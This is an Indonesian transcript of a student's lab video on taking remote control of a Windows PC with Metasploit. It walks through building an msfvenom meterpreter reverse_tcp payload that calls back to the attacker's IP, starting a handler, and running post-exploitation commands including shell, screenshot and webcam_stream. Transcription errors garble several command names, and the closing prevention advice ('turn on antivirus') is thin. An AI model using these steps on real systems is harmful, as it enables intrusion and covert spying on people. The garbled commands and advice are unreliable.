Oke, Assalamualaikum warahmatullahi wabarakatuh. Perkenalkan, nama saya Fajar Ihsan Pangestu dari kelas TRK 1A, Program Studi Teknologi Rekayasa Komputer, Politeknik Negeri Indramayu. Kali ini saya akan menjelaskan cara mengakses Windows dari jarak jauh menggunakan Kali Linux dan Metasploit untuk memenuhi tugas mata kuliah sistem operasi. Di sini saya bukan bermaksud untuk mengajari ataupun mencontohkan untuk penyalahgunaan yang bisa melanggar Undang-Undang ITE. Jadi ini hanya sekedar untuk media pembelajaran tentang keamanan atau pengujian keamanan. Oke, untuk aplikasi yang perlu disiapkan yaitu aplikasi VirtualBox yang sudah terinstal di dalamnya itu ada Kali Linux-nya dan internet atau WiFi yang satu jaringan dengan, jadi perumpamaannya itu Kali Linux sebagai pelakunya atau penyerangnya dan Windows sebagai korban atau targetnya. Nah, langsung saja. Pertama, untuk mematikan antivirusnya terlebih dahulu ya. Ini berlaku untuk penyerang dan targetnya. Oke. Kita matiin antivirusnya. Nah, setelah dimatikan, kita lanjut ke aplikasi VirtualBox-nya. Oke, klik setting. Di networknya kita seperti bridge adapter. Oke, klik start. Nah, untuk Kali Linux-nya sudah berjalan. Kita masukkan username dan passwordnya. Oke, langkah pertama kita masuk di Kali Linux-nya itu ke terminal. Nah, di terminal ini kita klik terutama cek IP-nya dulu, ifconfig. Kenapa kita cek IP? Karena ini jadi target sama pelaku itu, penyerangnya itu harus satu jaringan. Nah, ini IP-nya terdeteksi di 192.168.1.124. Oke, kemudian kita download aplikasi untuk Metasploit framework-nya ya. Oke. Untuk perintahnya itu di sudo apt update. Nah, update dan sudo apt install Metasploit framework. Nah, karena saya sudah install, jadi bagian ini kita skip ya. Nah, kalau kalian belum install berarti tinggal klik enter, nanti tinggal tunggu saja. Oke, untuk mengeceknya, kalau sudah terinstall Metasploit framework, kita masukkan perintah di msv console. Ini untuk mengecek ya, apakah sudah terinstall atau belum. Oke. Nah, ini tandanya sudah terinstall dan sudah bisa dijalankan perintah-perintah untuk ke korban. Oke, kita exit dulu. Yang pertama ya tadi cek IP, yang kedua berarti kita bikin file. Jadi file ini berfungsi untuk menaruh ke korban atau ke Windows-nya. Jadi saat file diklik dua kali atau diakses, itu bakal terlihat outputnya itu di Kali Linux-nya, masih di targetnya gitu. Oke, untuk download itu untuk membuat filenya ya, file tipe Excel di msv Pinom. Nah, strip P Windows Meterpreter reverse _tcp spasi lhost ini IP yang sudah kita ketahui tadi ya.
192.168.1.124. Nah, untuk helpernya ini saya pakainya di 4.444. Nah, untuk tipenya kan exe. Lebih dari, baru ini kita masukin nama filenya. Contohnya saya masukinnya trk aja. Katanya trk1.exe. Nah, kemudian klik enter. Oke, untuk file palette-nya ya sudah kita buat. Kemudian untuk mengetahui letak filenya, file palette-nya kita buka di folder. Nah, di sini sudah ada trk1.exe. Oke, nah gimana sih caranya agar si korban itu bisa mempunyai filenya? Saya contohnya di udah saya sendiri ya, di Windows System, jadi pakainya di machine, terus ke setting. Nah, habis itu ke set folder. Kita bikin saja di sini plus tambah add. Nah, untuk filenya mau taruh di mana? Bebas mau bikin folder baru ataupun di yang sudah ada namanya. Saya pakainya di sini ya, di Kali Linux. Nah, oke, terus select folder. Oke, untuk namanya saya di Kali Linux. Oke. Kemudian untuk mount point-nya auto mount sama make machine permanen. Oke, kita lanjut. Copy, berarti copy filenya itu ke sistem ya. cp trk1.exe spasi /media /sf kali sf linux. Ini itu nama file yang sudah kita buat tadi ya. Kita bisa ceknya di sini yang buka folder tadi. Nah, yang ini di perangkat terus sf linux. Nah, ini namanya. Oke. Terus slash enter. Nah, ini berarti sudah tercopy ya. Oke. Kita buktikan melalui Windows System atau Windows korbannya. Kita buka. Nah, sudah ada di Kali Linux. Oke. Kemudian kita lanjut untuk perintah-perintahnya ya. Oke, kita lanjut ke MSP console. Jadi ini untuk media ke target. MSP console. Oke. Nah, terus di sini kita lanjut ketik perintah use exploit /multi /handler. Oke, enter. Nah, kemudian set pilot Windows /meterpreter /reverse _tcp. Enter. Nah, baru kita setting untuk IP-nya. Set lhost 192.168.1.124 itu yang sudah kita ketahui dari atas ini ya. Oke, enter. Terus set untuk helpernya kita samaan sama MSP nom-nya, sama apa yang sudah kita buat tadi. Helpernya 4 kali ya. Kemudian exploit.
di sini belum terdeteksi, kita perlu klik 2 kali di korbannya. Oke, sudah klik 2 kali, kita cek. Nah, ini berarti kita sudah bisa akses ke korban atau ke Windows. Nah, kita tinggal jalankan saja perintahnya. Oke, yang pertama kita jalankan perintah di sysinfo. Oke, enter. Nah, jadi sysinfo ini untuk melihat perangkatnya, jadi perangkat Windows-nya ya. Nah, ini untuk nama komputernya, terus ini untuk sistem operasinya Windows 11, terus ini untuk arsitekturnya x64. Oke, kemudian kita lanjut ke perintah PS. Oke, kalau PS itu jadi apa aja kok yang korban jalankan sama saja kayak task manager. Jadi yang berjalan di korbannya. Nah, contohnya ya kayak ini. Yang di bawah kayak di task manager. Oke. Terus kita lanjut ke shell. Contohnya di ipconfig saja. Nah, ini berarti IP si korbannya ya, teman-teman. Jadi shell itu kita langsung ke perintah cmd si korban. Jadi kalau kita sudah perintah langsung, nah ini bakal nampilin dari korbannya. Jadi kita bisa lihat untuk keluarnya kita tinggal klik exit. Nah, kemudian kita jalankan lagi screenshot ya. Nah, ini letak filenya itu ada di Fajar. Nah, berarti ada di sini teman-teman. Folder. Nah, ini namanya Fajar. Nah, jadi kita bisa mendeteksi contoh korbannya itu menggunakan Windows sistem saya sendiri. Jadi gambarnya itu gambar saya sendiri ya. Oke, kita lanjut ke perintah selanjutnya yaitu ls. Nah, ls ini file directory dari si korbannya. Jadi file yang kita buat tadi yang di msv-vinom itu, nah letaknya itu ada di sini. Jadi aplikasi yang file-file yang kelompoknya itu ada di sini, kita bisa tampilkan, kita bisa tahu isi filenya kayak gitu. Nah, kita buktiin ya, di sini kan ada Kali Linux sama TRK yang kita buat tadi, aplikasi file yang kita buat tadi. Oke, coba kita ke Windows korbannya. Nah, di sini jadi tergantung korban meletakkan file yang sudah kita buat, lalu nah oke, contohnya webcam, lanjut webcam stream. Nah, jadi ini bakal nampilin korban sedang apa ya. Jadi bisa langsung kameranya tuh terdeteksi. Karena saya screen recorder jadi nggak bisa ya. Oke, karena tadi screen recordernya kameranya menyala, jadi kita menggunakan HP. Webcam stream. Jadi kondisi sekarang si korbannya itu atau dari Windowsnya, dari penggunanya ya, bakal nampilin ke Kali Linuxnya. Jadi kita bisa mendeteksi gimana kondisi pengguna sekarang, karena kita bisa mendeteksi melalui si kamera Windowsnya si penggunanya atau si korbannya. Nah, contohnya seperti ini. Ini berarti sudah terdeteksi ya. Oke. Ke terminal lagi. Nah, untuk
keluarnya kita tinggal exit. Untuk memberhentikannya atau untuk pencegahannya, bagaimana biar supaya tidak terjadi ketika ada penyerang atau untuk caranya itu kita cukup ketika menyalakan jaringan itu antivirusnya harus dinyalakan semua ya. Nyalakan. Nah, jadi si korban cukup mengaktifkan antivirus ketika menyalakan jaringan. Atau bisa juga kita bisa matikan jaringan, tapi lebih amannya itu kita mengaktifkan antivirusnya. Jika suatu hari terjadi ya, ini untuk pencegahannya. Oke, mungkin itu saja video cara mengakses Windows dari jarak jauh menggunakan Kali Linux atau Metasploit. Kurang lebihnya mohon maaf. Wassalamualaikum warahmatullahi wabarakatuh.